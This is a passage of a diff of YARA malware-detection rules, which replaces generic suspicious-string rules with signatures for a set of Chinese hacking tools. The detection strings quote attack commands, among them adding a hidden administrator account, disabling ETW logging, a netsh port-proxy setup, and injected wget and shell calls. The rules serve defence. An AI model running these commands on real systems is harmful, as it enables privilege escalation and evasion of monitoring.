+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = ".pdf.vbe" ascii
-		$s2 = ".pdf.vbs" ascii
-		$s3 = ".pdf.ps1" ascii
-		$s4 = ".pdf.bat" ascii
-		$s5 = ".pdf.exe" ascii
+		$s1 = "<description>IEBars</description>" fullword ascii
+		$s2 = "PECompact2" fullword ascii
+		$s3 = "Radmin, Remote Administrator" fullword wide
+		$s4 = "Radmin 3.0 Hash " fullword wide
+		$s5 = "HASH1.0" fullword wide
 
 	condition:
-		uint32( 0 ) == 0x21726152 and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Netsh_Portproxy_Command
+rule SIGNATURE_BASE_Oseditor : FILE
 {
 	meta:
-		description = "Detects a suspicious command line with netsh and the portproxy command"
+		description = "Chinese Hacktool Set - file OSEditor.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cbbd2042-572c-5283-bd45-e745b36733ad"
-		date = "2019-04-20"
-		modified = "2025-03-21"
-		reference = "https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-interface-portproxy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L295-L308"
+		id = "b308852c-3436-5748-9ba6-82d4c3c5fc14"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1607-L1624"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dbf82a908e77886af1c31c51f5f6684015cbcb22bf28876c2e1b0dd1ea5bd2b4"
-		score = 65
+		hash = "6773c3c6575cf9cfedbb772f3476bb999d09403d"
+		logic_hash = "6531c0b3c0f6123d9eda34ed028f05054e4805e5c329da4b29e4f37f9b5fc1b2"
+		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "9b33a03e336d0d02750a75efa1b9b6b2ab78b00174582a9b2cb09cd828baea09"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "netsh interface portproxy add v4tov4 listenport=" ascii
+		$s1 = "OSEditor.exe" fullword wide
+		$s2 = "netsafe" wide
+		$s3 = "OSC Editor" fullword wide
+		$s4 = "GIF89" ascii
+		$s5 = "Unlock" ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Dropperbackdoor_Keywords : FILE
+rule SIGNATURE_BASE_Goodtoolset_Ms11011 : FILE
 {
 	meta:
-		description = "Detects suspicious keywords that indicate a backdoor"
+		description = "Chinese Hacktool Set - file ms11011.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2942ba6d-a533-5954-bfcf-417262e2fac2"
-		date = "2019-04-24"
-		modified = "2025-03-21"
-		reference = "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L310-L322"
+		id = "689b7ea3-6707-5f99-8232-438d903d414d"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1626-L1642"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e83fa95bb2b9ac821d0a00af23834495066ad2cad38ef4f4dcc81aee75415d74"
-		score = 65
+		hash = "5ad7a4962acbb6b0e3b73d77385eb91feb88b386"
+		logic_hash = "99dd27eba7da44c71098446e17abfe626de91e899e28c2d2e99e7b54b9e0c825"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x4 = "DropperBackdoor" fullword wide ascii
+		$s0 = "\\i386\\Hello.pdb" ascii
+		$s1 = "OS not supported." fullword ascii
+		$s3 = "Not supported." fullword wide
+		$s4 = "SystemDefaultEUDCFont" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_SFX_Cmd : FILE
+rule SIGNATURE_BASE_Freeversion_Release : FILE
 {
 	meta:
-		description = "Detects suspicious SFX as used by Gamaredon group"
+		description = "Chinese Hacktool Set - file release.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "87e75fe6-c2d7-5cb4-9432-7c37dbfe94b8"
-		date = "2018-09-27"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L324-L336"
+		id = "1a603634-a00a-5f8b-a47d-c3c8065a5c3e"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1644-L1662"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "592de6a2165396c4ae8f494e26e56d0a759903b51167b1531b791897dce66868"
-		score = 65
-		quality = 60
+		hash = "f42e4b5748e92f7a450eb49fc89d6859f4afcebb"
+		logic_hash = "38722afb3b955aced2e68e2048a3268722524f61784dcb45c6a695b5684230eb"
+		score = 75
+		quality = 85
 		tags = "FILE"
-		hash1 = "965129e5d0c439df97624347534bc24168935e7a71b9ff950c86faae3baec403"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = /RunProgram=\"hidcon:[a-zA-Z0-9]{1,16}.cmd/ fullword ascii
+		$s1 = "-->Got WMI process Pid: %d " ascii
+		$s2 = "This exploit will execute \"net user " ascii
+		$s3 = "net user temp 123456 /add & net localgroup administrators temp /add" fullword ascii
+		$s4 = "Running reverse shell" ascii
+		$s5 = "wmiprvse.exe" fullword ascii
+		$s6 = "SELECT * FROM IIsWebInfo" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
 }
-rule SIGNATURE_BASE_SUSP_XMRIG_Reference : FILE
+rule SIGNATURE_BASE_Churrasco : FILE
 {
 	meta:
-		description = "Detects an executable with a suspicious XMRIG crypto miner reference"
+		description = "Chinese Hacktool Set - file churrasco.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0a7324ce-90dc-5e6a-b22a-c29eccf324e9"
-		date = "2019-06-20"
-		modified = "2025-03-21"
-		reference = "https://twitter.com/itaitevet/status/1141677424045953024"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L338-L350"
+		id = "99cb5a7a-85c1-57f5-b5b6-f0b1092e1e06"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1664-L1681"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c1e6f5fc390a8ada0688885bba7ed90372915deba5a5e7e5b0cd17ec450ce240"
-		score = 70
+		hash = "a8d4c177948a8e60d63de9d0ed948c50d0151364"
+		logic_hash = "36ca7c8d1579eeb571c182c033c312b3b231313b8950c1e24eeb3df793b004c4"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "\\xmrig\\" ascii
+		$s1 = "Done, command should have ran as SYSTEM!" ascii
+		$s2 = "Running command with SYSTEM Token..." ascii
+		$s3 = "Thread impersonating, got NETWORK SERVICE Token: 0x%x" ascii
+		$s4 = "Found SYSTEM token 0x%x" ascii
+		$s5 = "Thread not impersonating, looking for another thread..." ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them
 }
-rule SIGNATURE_BASE_SUSP_Just_EICAR : FILE
+rule SIGNATURE_BASE_X64_Kiwicmd : FILE
 {
 	meta:
-		description = "Just an EICAR test file - this is boring but users asked for it"
+		description = "Chinese Hacktool Set - file KiwiCmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5eedd77-36e2-56a0-be0c-2553043c225a"
-		date = "2019-03-24"
-		modified = "2025-03-21"
-		reference = "http://2016.eicar.org/85-0-Download.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L352-L365"
+		id = "df759fd4-5d42-5dd9-81d0-ceccafcdd64d"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1682-L1697"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a48fc3542fb07131fe0a2e25277009d21b9ca7c9e112873249e5b9c31511af79"
-		score = 40
+		hash = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"
+		logic_hash = "b49a70a49a67fbb57d643b38155482177f594bd1f01f5464c4f36b265aac48d8"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" fullword ascii
+		$s1 = "Process Ok, Memory Ok, resuming process :)" fullword wide
+		$s2 = "Kiwi Cmd no-gpo" fullword wide
+		$s3 = "KiwiAndCMD" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x3558 and filesize < 70 and $s1 at 0
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 2 of them
 }
-rule SIGNATURE_BASE_SUSP_PDB_Path_Keywords : FILE
+rule SIGNATURE_BASE_Sql1433_SQL : FILE
 {
 	meta:
-		description = "Detects suspicious PDB paths"
+		description = "Chinese Hacktool Set - file SQL.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cbd9b331-58bb-5b29-88a2-5c19f12893a9"
-		date = "2019-10-04"
-		modified = "2025-03-21"
-		reference = "https://twitter.com/stvemillertime/status/1179832666285326337?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L367-L393"
+		id = "fb4c5958-2e4e-5231-b0db-eca6bc3d823a"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1699-L1715"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "274b4b40190b8f7e3d123fad63e2bb6b2114a3dbef062791d442109cac149b08"
-		score = 65
+		hash = "025e87deadd1c50b1021c26cb67b76b476fafd64"
+		logic_hash = "5ceecc4f345cb603a0b03180f3f09f97e5f951b5d75c469aefffe3ec62916a8f"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "Debug\\Shellcode" ascii
-		$ = "Release\\Shellcode" ascii
-		$ = "Debug\\ShellCode" ascii
-		$ = "Release\\ShellCode" ascii
-		$ = "Debug\\shellcode" ascii
-		$ = "Release\\shellcode" ascii
-		$ = "shellcode.pdb" nocase ascii
-		$ = "\\ShellcodeLauncher" ascii
-		$ = "\\ShellCodeLauncher" ascii
-		$ = "Fucker.pdb" ascii
-		$ = "\\AVFucker\\" ascii
-		$ = "ratTest.pdb" ascii
-		$ = "Debug\\CVE_" ascii
-		$ = "Release\\CVE_" ascii
-		$ = "Debug\\cve_" ascii
-		$ = "Release\\cve_" ascii
+		$s0 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 31 00 34 00 33 00 33 }
+		$s1 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 31 00 2C 00 34 00 2C 00 33 00 2C 00 33 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 90KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Disable_ETW_Jun20_1
+rule SIGNATURE_BASE_Cookietools2 : FILE
 {
 	meta:
-		description = "Detects method to disable ETW in ENV vars before executing a program"
+		description = "Chinese Hacktool Set - file CookieTools2.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ea5dee09-959e-5ef2-8f84-5497bdef0a05"
-		date = "2020-06-06"
-		modified = "2025-03-21"
-		reference = "https://gist.github.com/Cyb3rWard0g/a4a115fd3ab518a0e593525a379adee3"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L395-L413"
+		id = "f227ba4b-9cad-5aac-99ab-46a8237249d4"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1717-L1733"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "182ad2512bcfbcd92d13380113b32982eb367e458019f07038a12f494dfbebb6"
-		score = 65
+		hash = "cb67797f229fdb92360319e01277e1345305eb82"
+		logic_hash = "8ddb8ea0bc047877d91f25375745ab8fa66af28b6b41de36e0fb16ea8284fce5"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "set COMPlus_ETWEnabled=0" ascii wide fullword
-		$x2 = "$env:COMPlus_ETWEnabled=0" ascii wide fullword
-		$s1 = "Software\\Microsoft.NETFramework" ascii wide
-		$sa1 = "/v ETWEnabled" ascii wide fullword
-		$sa2 = " /d 0" ascii wide
-		$sb4 = "-Name ETWEnabled"
-		$sb5 = " -Value 0 "
+		$s1 = "www.gxgl.com&www.gxgl.net" fullword wide
+		$s2 = "ip.asp?IP=" fullword ascii
+		$s3 = "MSIE 5.5;" fullword ascii
+		$s4 = "SOFTWARE\\Borland\\" ascii
 
 	condition:
-		1 of ( $x* ) or 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_PE_Discord_Attachment_Oct21_1 : FILE
+rule SIGNATURE_BASE_Cyclotron : FILE
 {
 	meta:
-		description = "Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)"
+		description = "Chinese Hacktool Set - file cyclotron.sys"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7c217350-4a35-505d-950d-1bc989c14bc2"
-		date = "2021-10-12"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L415-L429"
+		id = "7099462b-2a72-56cd-8a50-27cd445eb9d2"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1735-L1752"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4d84ec50738f4c7aca8e77c3aabdcd77f3071733a2245a58283f070f2b220599"
-		score = 70
+		hash = "5b63473b6dc1e5942bf07c52c31ba28f2702b246"
+		logic_hash = "f3a0edf54039479c9f4e46b20249465bbe1bca57f47afeba37965e6e3fc0127f"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "https://cdn.discordapp.com/attachments/" ascii wide
+		$s1 = "\\Device\\IDTProt" wide
+		$s2 = "IoDeleteSymbolicLink" fullword ascii
+		$s3 = "\\??\\slIDTProt" wide
+		$s4 = "IoDeleteDevice" fullword ascii
+		$s5 = "IoCreateSymbolicLink" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Encoded_Discord_Attachment_Oct21_1 : FILE
+rule SIGNATURE_BASE_Xscan_Gui : FILE
 {
 	meta:
-		description = "Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)"
+		description = "Chinese Hacktool Set - file xscan_gui.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "06c086f4-8b79-5506-9e3f-b5d099106157"
-		date = "2021-10-12"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_strings.yar#L431-L456"
+		id = "fee11058-e75f-5d8f-8d10-06dcaed99df1"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1754-L1770"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1ea5a83e91b5c5b4b8a1d507c365bc1583394c97a28b7d7a576f085854676769"
-		score = 70
+		hash = "a9e900510396192eb2ba4fb7b0ef786513f9b5ab"
+		logic_hash = "366db7eb19725a0a42ce371d7bfb50a22a259f0bc0252927af626e8c1c0b9b59"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$enc_b01 = "Y2RuLmRpc2NvcmRhcHAuY29tL2F0dGFjaG1lbnRz" ascii wide
-		$enc_b02 = "Nkbi5kaXNjb3JkYXBwLmNvbS9hdHRhY2htZW50c" ascii wide
-		$enc_b03 = "jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudH" ascii wide
-		$enc_b04 = "AGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABz" ascii wide
-		$enc_b05 = "BjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAc" ascii wide
-		$enc_b06 = "AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AH" ascii wide
-		$enc_h01 = "63646E2E646973636F72646170702E636F6D2F6174746163686D656E7473" ascii wide
-		$enc_h02 = "63646e2e646973636f72646170702e636f6d2f6174746163686d656e7473" ascii wide
-		$enc_r01 = "stnemhcatta/moc.ppadrocsid.ndc" ascii wide
+		$s1 = "%s -mutex %s -host %s -index %d -config \"%s\"" fullword ascii
+		$s2 = "www.target.com" fullword ascii
+		$s3 = "%s\\scripts\\desc\\%s.desc" fullword ascii
+		$s4 = "%c Active/Maximum host thread: %d/%d, Current/Maximum thread: %d/%d, Time(s): %l" ascii
 
 	condition:
-		filesize < 5000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_VULN_LNX_OMI_RCE_CVE_2021_386471_Sep21 : CVE_2021_38647 FILE
+rule SIGNATURE_BASE_CN_Tools_Hscan : FILE
 {
 	meta:
-		description = "Detects a Linux OMI version vulnerable to CVE-2021-38647 (OMIGOD) which enables an unauthenticated RCE"
-		author = "Christian Burkard"
-		id = "ca49f0cc-ea33-559c-bd4f-306a01315fce"
-		date = "2021-09-16"
+		description = "Chinese Hacktool Set - file hscan.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "82d9cd61-8cef-56b4-8dfe-a28edaa781b8"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_cve_2021_386471_omi.yar#L1-L37"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1772-L1792"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "99fddcf763f41a08a8ef8240d544ef67b840a1b5ae709bd7efbcbcad8268e8a5"
-		score = 50
+		hash = "17a743e40790985ececf5c66eaad2a1f8c4cffe8"
+		logic_hash = "9bc4800249bffcc4b8fc1191d600f0b9b2a7b0c1f067039c83c03671a0b4b5c5"
+		score = 75
 		quality = 85
-		tags = "CVE-2021-38647, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "/opt/omi/bin/omiagent" ascii fullword
-		$s1 = "OMI-1.6.8-0 - " ascii
-		$s2 = "OMI-1.6.6-0 - " ascii
-		$s3 = "OMI-1.6.4-1 - " ascii
-		$s4 = "OMI-1.6.4-0 - " ascii
-		$s5 = "OMI-1.6.2-0 - " ascii
-		$s6 = "OMI-1.6.1-0 - " ascii
-		$s7 = "OMI-1.5.0-0 - " ascii
-		$s8 = "OMI-1.4.4-0 - " ascii
-		$s9 = "OMI-1.4.3-2 - " ascii
-		$s10 = "OMI-1.4.3-1 - " ascii
-		$s11 = "OMI-1.4.3-0 - " ascii
-		$s12 = "OMI-1.4.2-5 - " ascii
-		$s13 = "OMI-1.4.2-4 - " ascii
-		$s14 = "OMI-1.4.2-3 - " ascii
-		$s15 = "OMI-1.4.2-2 - " ascii
-		$s16 = "OMI-1.4.2-1 - " ascii
-		$s17 = "OMI-1.4.1-1 - " ascii
-		$s18 = "OMI-1.4.1-0 - " ascii
-		$s19 = "OMI-1.4.0-6 - " ascii
+		$s1 = "%s -f hosts.txt -port -ipc -pop -max 300,20 -time 10000" fullword ascii
+		$s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,20" fullword ascii
+		$s3 = "%s -h www.target.com -all" fullword ascii
+		$s4 = ".\\report\\%s-%s.html" fullword ascii
+		$s5 = ".\\log\\Hscan.log" fullword ascii
+		$s6 = "[%s]: Found cisco Enable password: %s !!!" fullword ascii
+		$s7 = "%s@ftpscan#FTP Account:  %s/[null]" fullword ascii
+		$s8 = ".\\conf\\mysql_pass.dic" fullword ascii
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and $a1 and 1 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_EXPL_LOG_Cacti_Commandinjection_CVE_2022_46169_Dec22_1 : CVE_2022_46169
+rule SIGNATURE_BASE_Goodtoolset_Pr : FILE
 {
 	meta:
-		description = "Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169"
-		author = "Nasreddine Bencherchali"
-		id = "c799a419-87ed-55ea-8ebb-d4da901be4ad"
-		date = "2022-12-27"
+		description = "Chinese Hacktool Set - file pr.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d00e1873-f2a5-5e89-9223-ead418e2667c"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cve_2022_46169_cacti.yar#L1-L13"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1794-L1812"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6ccd3b830deb5c5d65519274c4c528203a2a14a177382334da87e288174e2cfe"
-		score = 70
-		quality = 60
-		tags = "CVE-2022-46169"
+		hash = "f6676daf3292cff59ef15ed109c2d408369e8ac8"
+		logic_hash = "0673bc445422f4339c9e81ff8ae8a9b2bb9bc1f107b85fe34906444a1754c43b"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xr1 = /\/remote_agent\.php.{1,300}(whoami|\/bin\/bash|\/bin\/sh|\bwget\b|powershell|cmd \/c|cmd\.exe \/c).{1,300} 200 / ascii
+		$s1 = "-->Got WMI process Pid: %d " ascii
+		$s2 = "-->This exploit gives you a Local System shell " ascii
+		$s3 = "wmiprvse.exe" fullword ascii
+		$s4 = "Try the first %d time" fullword ascii
+		$s5 = "-->Build&&Change By p " ascii
+		$s6 = "root\\MicrosoftIISv2" fullword wide
 
 	condition:
-		$xr1
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_EXPL_LNX_CUPS_CVE_2024_47177_Sep24 : CVE_2024_47177 FILE
+rule SIGNATURE_BASE_Hydra_7_4_1_Hydra : FILE
 {
 	meta:
-		description = "Detects exploit code for CUPS CVE-2024-47177"
-		author = "Florian Roth"
-		id = "a7b986ad-e943-5350-a6e0-34c40f07874c"
-		date = "2024-09-27"
-		modified = "2024-12-12"
-		reference = "https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cups_sep24.yar#L2-L15"
+		description = "Chinese Hacktool Set - file hydra.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cf692bea-091d-5be0-a012-caba01e96dde"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1814-L1832"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "633314dea5e3cbdf3cef6e4f18c2efca261dfc600bb9c11d0834fdae102ac9e6"
+		hash = "3411d0380a1c1ebf58a454765f94d4f1dd714b5b"
+		logic_hash = "f52696cbf7355c982d1a1e0c73dce65324845c5ffc13c541e326720332b4788d"
 		score = 75
 		quality = 85
-		tags = "CVE-2024-47177, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "FoomaticRIPCommandLine: " ascii
-		$s2 = "cupsFilter2 : " ascii
+		$s1 = "%d of %d target%s%scompleted, %lu valid password%s found" fullword ascii
+		$s2 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" fullword ascii
+		$s3 = "hydra -P pass.txt target cisco-enable  (direct console access)" fullword ascii
+		$s4 = "[%d][smb] Host: %s Account: %s Error: PASSWORD EXPIRED" fullword ascii
+		$s5 = "[ERROR] SMTP LOGIN AUTH, either this auth is disabled" fullword ascii
+		$s6 = "\"/login.php:user=^USER^&pass=^PASS^&mid=123:incorrect\"" fullword ascii
 
 	condition:
-		filesize < 400KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
 }
-rule SIGNATURE_BASE_SUSP_EXPL_LNX_CUPS_CVE_2024_47177_Sep24 : CVE_2024_47177
+rule SIGNATURE_BASE_CN_Tools_Srss_2 : FILE
 {
 	meta:
-		description = "Detects suspicious FoomaticRIPCommandLine command in printer config, which could be used to exploit CUPS CVE-2024-47177"
-		author = "Florian Roth"
-		id = "cb76f1c7-6dc0-5fed-a970-2a4890db46d3"
-		date = "2024-09-27"
-		modified = "2024-12-12"
-		reference = "https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8"
